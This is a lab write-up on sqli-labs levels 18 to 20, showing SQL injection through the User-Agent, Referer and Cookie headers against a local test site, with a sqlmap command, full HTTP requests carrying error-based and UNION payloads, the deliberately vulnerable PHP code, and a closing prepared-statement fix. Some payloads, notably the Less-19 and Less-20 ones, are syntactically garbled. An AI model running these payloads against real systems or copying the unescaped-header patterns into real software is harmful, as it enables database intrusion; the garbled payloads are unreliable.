MySQL SQL Injection Getting Started: Using Sqli-labs, Part 4 (Less 18-20)

Source: Internet
Author: User

The injection points in this part are all created from values taken out of HTTP request headers rather than from form fields.

Header fields that commonly end up as injection points are Referer, X-Forwarded-For, Cookie, X-Real-IP, Accept-Language and Authorization, because applications often log or store them without treating them as user input.

    • Less-18 Header Injection - User-Agent - Error based - string

1) Tool usage:
The injection point is the User-Agent header, so sqlmap's -r option is used: save the captured request to a file 1.txt, append an asterisk (*) to the User-Agent value to mark the injection point, and then run the following command:

      • sqlmap -r 1.txt --current-db --threads 10 --batch --technique BEST

Test packet 1.txt:

    POST /hacker/sqli-labs-master/less-18/index.php HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0*
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1/hacker/sqli-labs-master/less-18/index.php
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 38

    uname=admin&passwd=admin&submit=Submit

2) Manual injection
As in all the earlier levels, as long as the page echoes database errors, once the surrounding single quote is matched correctly an updatexml() error-based statement can be used directly to confirm the injection point:

    POST /hacker/sqli-labs-master/less-18/index.php HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0' and updatexml(1,concat(0x7e,database()),1) and '1'='1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1/hacker/sqli-labs-master/less-18/index.php
    Connection: close
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 38

    uname=admin&passwd=admin&submit=Submit

3) Code that creates the injection point

check_input() truncates a non-empty value to 20 characters and, unless it is purely numeric, quotes it with mysql_real_escape_string(). It is applied to the POST fields uname and passwd, but not to the User-Agent value that is later written into the uagents table:

    function check_input($value)
    {
        if (!empty($value))
        {
            // truncation (see comments)
            $value = substr($value, 0, 20);
        }
        // Stripslashes if magic quotes enabled
        if (get_magic_quotes_gpc())
        {
            $value = stripslashes($value);
        }
        // Quote if not a number
        if (!ctype_digit($value))
        {
            $value = "'" . mysql_real_escape_string($value) . "'";
        }
        else
        {
            $value = intval($value);
        }
        return $value;
    }

    $uagent = $_SERVER['HTTP_USER_AGENT'];
    $IP = $_SERVER['REMOTE_ADDR'];
    echo "<br>";
    echo 'Your IP ADDRESS is: ' . $IP;
    echo "<br>";
    //echo 'Your User Agent is: ' . $uagent;
    // take the variables
    if (isset($_POST['uname']) && isset($_POST['passwd']))
    {
        $uname = check_input($_POST['uname']);
        $passwd = check_input($_POST['passwd']);

        // logging the connection parameters to a file for analysis
        $fp = fopen('result.txt', 'a');
        fwrite($fp, 'User Agent:' . $uname . "\n");
        fclose($fp);

        $sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
        $result1 = mysql_query($sql);
        $row1 = mysql_fetch_array($result1);
        if ($row1)
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            // the injection point: $uagent and $IP are concatenated into the INSERT without escaping
            $insert = "INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
            mysql_query($insert);

    • Less-19 Header Injection - Referer - Error based - string

This injection point is created from the Referer header, which is written to the database with an INSERT statement without any validation or escaping.

Payload (the injected statement that is used):

    Referer: ' and (select 1690 from (select COUNT (*), CONCAT (0x716a707171, (MID () ((Ifnull () ((), 0x20), 1,54 ), 0x717a767671,floor (RAND (0) *)) x from INFORMATION_SCHEMA.Character_sets GROUP by X) a) and ' qmqa ' = ' Qmqa

Full HTTP request package:

    POST /sqli-labs-master/less-19/ HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1/sqli-labs-master/less-19/' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 38

    uname=admin&passwd=admin&submit=Submit

Core code (identical to Less-18 except that the Referer header is stored in the referers table):

    function check_input($value)
    {
        if (!empty($value))
        {
            // truncation (see comments)
            $value = substr($value, 0, 20);
        }
        // Stripslashes if magic quotes enabled
        if (get_magic_quotes_gpc())
        {
            $value = stripslashes($value);
        }
        // Quote if not a number
        if (!ctype_digit($value))
        {
            $value = "'" . mysql_real_escape_string($value) . "'";
        }
        else
        {
            $value = intval($value);
        }
        return $value;
    }

    $uagent = $_SERVER['HTTP_REFERER'];
    $IP = $_SERVER['REMOTE_ADDR'];
    echo "<br>";
    echo 'Your IP ADDRESS is: ' . $IP;
    echo "<br>";
    //echo 'Your User Agent is: ' . $uagent;
    // take the variables
    if (isset($_POST['uname']) && isset($_POST['passwd']))
    {
        $uname = check_input($_POST['uname']);
        $passwd = check_input($_POST['passwd']);

        $fp = fopen('result.txt', 'a');
        fwrite($fp, 'Referer:' . $uname . "\n");
        fclose($fp);

        $sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
        $result1 = mysql_query($sql);
        $row1 = mysql_fetch_array($result1);
        if ($row1)
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            // the injection point: the raw Referer value is concatenated into the INSERT
            $insert = "INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
            mysql_query($insert);

    • Less-20 Cookie Injection - Error based - string

Payload

    Cookie: dumb-4829' UNION ALL SELECT NULL,CONCAT(0x7170786271,IFNULL(DATABASE() AS CHAR),0x20),0x7176706271),NULL---

Core code

The flow is: 1) receive the user name and password; 2) if they are correct, set the user name as the cookie value; 3) on later requests, query the database for a user whose name equals the cookie value. The cookie value is decoded and concatenated straight into the query.

Lines 144-147:

    $cookee = base64_decode($cookee);
    echo "<br></font>";
    $sql = "SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";
    $result = mysql_query($sql);

Lines 188-189:

    echo "Your Cookie is deleted";
    setcookie('uname', base64_encode($row1['username']), time() - 3600);
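For comparison, here is a hardened rewrite of the Less-18 logic, added as an example and not part of sqli-labs: every header-derived value (User-Agent, client IP) is bound as a parameter with mysqli prepared statements instead of being concatenated into the query, and the same pattern closes the Referer INSERT in Less-19 and the cookie SELECT in Less-20. It assumes a mysqli connection to the lab's `security` database with the `users` and `uagents` tables; the connection credentials are placeholders.

```php
<?php
// Added example: hardened rewrite of the Less-18 login/logging code.
// Not sqli-labs code. Assumes the lab's `security` database with the
// `users` and `uagents` tables and a mysqli connection $conn.
function record_login(mysqli $conn, string $uname, string $passwd): bool
{
    // Header values are attacker-controlled input, exactly like POST fields.
    $uagent = $_SERVER['HTTP_USER_AGENT'] ?? '';
    $ip     = $_SERVER['REMOTE_ADDR'] ?? '';

    // 1. Credential check: values are bound, never spliced into SQL, so
    //    neither quoting nor the 20-character truncation is needed.
    $stmt = $conn->prepare(
        'SELECT username, password FROM users'
        . ' WHERE username = ? AND password = ? ORDER BY id DESC LIMIT 1'
    );
    $stmt->bind_param('ss', $uname, $passwd);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    if ($row === null) {
        return false;
    }

    // 2. Logging INSERT: the lab concatenates $uagent and $IP here, which is
    //    the injection point (check_input() was never applied to them).
    //    Binding the values removes it regardless of their content.
    $stmt = $conn->prepare(
        'INSERT INTO uagents (uagent, ip_address, username) VALUES (?, ?, ?)'
    );
    $stmt->bind_param('sss', $uagent, $ip, $uname);
    $stmt->execute();
    $stmt->close();
    return true;
}

if (isset($_POST['uname'], $_POST['passwd'])) {
    // Placeholder connection parameters; replace with real ones.
    $conn = new mysqli('127.0.0.1', 'DB_USER', 'DB_PASSWORD', 'security');
    $conn->set_charset('utf8mb4');
    if (record_login($conn, $_POST['uname'], $_POST['passwd'])) {
        echo 'Login succeeded; user agent recorded.';
    } else {
        echo 'Login failed.';
    }
}
```

The error-based technique shown above also depends on MySQL error text being echoed to the client; with bound parameters that no longer yields injection, but database errors should still be logged server-side rather than displayed.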
